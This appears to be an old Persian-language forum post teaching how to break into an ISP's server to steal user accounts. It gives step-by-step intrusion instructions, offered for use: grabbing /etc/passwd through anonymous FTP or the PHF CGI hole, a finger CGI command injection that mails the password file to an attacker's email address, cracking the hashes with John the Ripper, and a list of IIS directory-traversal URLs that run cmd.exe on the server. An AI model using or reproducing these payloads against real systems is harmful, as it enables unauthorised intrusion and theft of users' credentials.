خوب این کار n راه داره اما اینو بدون که سایتها انقدا هم درپیت نیستن که بشه راحت ازشون اکانت پیچوند و عشق دنیا رو کرد !
 من یه چندتا راه رو می گم که اگه سعی کنی و دنبالشو بگیری حتما یادمی گیری ! ببین برای بدست آوردن یوزرنیم و اکانت های یک آی اس پی باید به هاردسرور اون آی اس ژی متصل بشی !در این راه احتمالا با مشکلات زیادی برخورد خواهید کرد .من راه کامل و بی عیبی را در اختیار شما نمی گذارم برای هکر شدن باید تلاش بسیاری کرد و این اشاره ای است که شما را به طرف راه درست هدایت می کند .برای هک یونیکس از این طریق عمل می کنند که با روش هایی که ذکر خواهد شد فایل حاوی  Passwordها و ID ها را که به نام  Passwdمی باشد دریافت کنند .این فایل یک فایل متنی است که در آن اطلاعات بصورت رمز در آمده .وقتی شکا یک فایل   Passwd را باز کنید چنین نوشته هایی را می بینید .که باید آن را از حالت رمز در آورد .
 root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
 admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh
 Ahmad hacker:3A62i9qr:1012:10:Mashhad
 در اینجا مثلا ahmad hacker نام IDو 3a62... کلمه ی عبور اما به صورت رمز در آمده می باشد .
 شاید فایل به شکل زیر هم باشد .اما این فایل کار را غیرممکنمی سازد.در صورتی که به شکل زیر باشد یعنی در آن علامت *به جای کلمه ی به رمز آمده به آن ها  Shadowedگفته می شود .
 
 root:*1:Operator:/:/bin/csh
 admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
 ahmad hacker:*:1012:10:mashhad BFH:/home/user/ahmad hacker:/usr/local/bin/tcsh
 
 حالا از اول یکم راحت تر این روش رو که حمله از طریق dos هست رو میگم
 بعد از اتصال کامل باید از آی اس پی تون یه whois بگیرید ! اگه سایت مورد نظرتون برای org , net , com است من www.samspade.org رو پیشنهاد می کنم ! و روششم اینطوری هست :
 
 http://www.samspade.org/t/whois?a=ahmad hacker.com
 
 که بجای ahmad hacker.com آدرس سایت مورد نظرتون رو بنویسید حالا یه صفحه باز میشه که کلی اطلاعات در مورد این سایت نوشته ما با اونا کارنداریم فقط باید دنبال کلمه Domain servers یا بعضی موقه ها اگه اون نبود دنبال DNS Servers می گردیم که یا بالای صفحه هست یا پایین !
 حالا وارد قسمت Command Prompt بشید که همون داس خودمونه تایپ کنید !
 FTP http://www.domain.com
 که Domainآدرس سرور ISP هستش که اون بالا توضیح دادم بعد از شما خواسته می شه تا آیدی خودتونو وارد کنید کلمه  Anonymousرا بزنید وقتی درخواست کلمه عبور شد کلید Enterرا بزن .اگر وارد سیستم شدی موفق شده ای در غیر این صورت جمله ی login failedدریافت می شه . خوب پس این دفعه Password رو آدرس یهEmail را وارد کن .اگر این بار هم جواب نداد این دفعه روش های زیر رو امتحان کن :
 
 FTP ftp.domain.com
 
 خلاصه تمام تلاش خودتو برای فهمیدن روش دستیابی به سیستم بکن اگر توانستید وارد سیستم بشی به راحتی می توانی وارد شاخه ی مشخصی رفته و فایل Passwdها را بگیری ولی احتمال دارد که آن شاخه برای شما قفل شده باشد .برای کار با  FTPباید دستورات FTPرا بلد باشی برای اینکه دستورات رو ببینید ? رو تایپ کنید . حالا به شاخه ی ETCبرو می توانی فایل passwd را در آنجا پیدا کنی .این فایل را بگیر .اگر تو اونجا نبود شاخه های دیگه رو امتحان کن . ولی به احتمال زیاد همونجاست .حال اگر اصلا نتوانستید وارد FTPشوید می توانید این فایل را با استفاده از قایلبیت  PHFبگیرید .به این صورت که در Internet Browserخود آدرس زیر را وارد کن .
 
 http://www.domain.com/cgi-bin/phf?Q...t%20/etc/passwd
 
 اگر به این صورت هم نتوانستید آن را بگیرید می توانید از طریق Fingerاین کار را انجام بده .این روش به شرطی جواب می دهد که Serverمورد نظر قابلیت Fingerرا داشته باشد .به آدرس زیر مراجعه کن .
 
 www.domain.com/cgi-bin/finger
 
 اگر این آدرس کار کنه کادری جلوت ظاهر می شه که ازت می خواد نام مورد نظر خود را وارد کنی آدرس زیر را وارد کنید .
 
 ID@domain.com ; /bin/mail you@somewhere.com < etc/passwd
 
 که در این آدرس IDشناسه کاربری یک شخص است که مثلا می توانید از آیدی دوستتان استفاده کنید     domain.comآدرس نام حوزه ی ISPاست و آدرس you@somewhere.comآدرس Emailشماست مثلا این یک نمونه است .
 
 bfh@internet.com ; /bin/mail amir6_6_6i@yahoo.com < etc/passwd
 
 با وارد کردن این دستور فایل Passwdبرای من به آدرس ahmadx4u@yahoo.com
 پست می شi !
 
 خوب حالا تا الان اگر توانسته اید فایل را گرفته باشید که بهتر در غیر اینصورت باید بی خیال این روش بشی .
 حالا اگر یه فایل مثل نمونه ی اولی که در بالا بود گیر آوردی می توانی کار خود را ادامه بدی حالا شما نیاز به یک برنامه ی Unix Password Crackerدارید معروف ترین این نوع برنامه ها John Ripperو Cracker Jack هستش .اما John Ripper سریعترین نوع این برنامه می باشد .این دو برنامه را می توانید از همان آدرس قبلی یعنی    www.hackersclub.com/km/frontpageبه دست بیاوری ! این روشهای بالایی ماله سیستم های یونیکس هست که الان تقریبا هفتاد درصد از یونیکس استفاده می کنند !
 
 روش بعدی استفاده از اسکریپت ها هست که صد در صد عملی هست اما یکم مشکل هست !
 تو این روش شما باید روش exploit و نوشتن اسکریبتها رو بلد باشیو بدون هیچ تروجان بک دوری می تونی وارد هارد سرور بشی !
 این روش اینطوری هست که بعد از بدست آوردن سرور باید آی پی سرور رو هم بدست بیاری برای بدست آوردن آی پی سرور از فرمان nslookup تو داس استفاده می کنیم !
 C:>nslookup
 که بعد از تایژ این فرمان یه چیزایی میاد و آخرین سطر یه علامت < هست که شما باید جلوی اون آدرس سرور رو بنویسید مثلا :
 server s1.ahmad hacker.com<
 که جواب میشنویم
 Default Server: s1.ahmad hacker.com
 Address: 194.165.8.60
 حالا باید بانوشتن اسکریبت ها وارد هارد سرور بشیم !
 من در مورد نوشتن اسکریپت ها چیزی نمی گم چون که با یه کی دو خط نمی شه چیزی فهمید !
 شما بعد از نوشتن اسکریپت می تونید به شکل زیر ازش استفاده کنی !
 http://serverip/script
 که به جای serverip آی پی سرور بدست اومده رو می نویسیم و به جای script هم اون اسکریژتی که نوشتیم حالا خیلی راحت وارد هارد سرور می شی ! من نا امیدت نمی کنم امتحان کن یه نرم افزار برات معرفی می کنم که این اسکریپت هارو سرچ می کنه ! اما کامل نیست و زیاد نمیشه بهش تکیه کرد از این http://www.astalavistalab.com/files/cgis4.zip آدرس دانلود کنید اسمشم CGI Scanner هست !
 روش کارشم اینه که آدرس آی پی سرور رو تو قسمت و Url مینویسی و از منوی rule set گزینه scan all رو تایپ می کنی ! البنه می تونی مستقیما آدرس سایت رو تو قسمت Url بنویسی اما درصد خطا خیلی زیاد می شه ! من یه چند تا اسکرپت رایج رو برات می گم ! البته برای هر سرور یه اسکریپت جواب میده :
 
 
 HTTP://194.165.8.60/scripts/..%25%35%63../..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir
 HTTP://194.165.8.60/scripts/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
 HTTP://194.165.8.60/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
 HTTP://194.165.8.60/scripts/..%%35c../..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir
 HTTP://194.165.8.60/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
 HTTP://194.165.8.60/scripts/..%%35c../..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir
 HTTP://194.165.8.60/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
 HTTP://194.165.8.60/scripts/..%%35%63../..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
 HTTP://194.165.8.60/scripts/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
 HTTP://194.165.8.60/scripts/..%%35%63../..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
 HTTP://194.165.8.60/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
 TTP://194.165.8.60/scripts/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c%20dir%20C:
 HTTP://194.165.8.60/scripts/..%u00255c../..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir
 
 راه های دیگه ای هم هستن مثل تروجانهای بک دور و ... اما هم مشکل ترن هم اینکه به خاطر فایروال ها و ... دیر و خیلی سخت به نتیجه می شه رسید !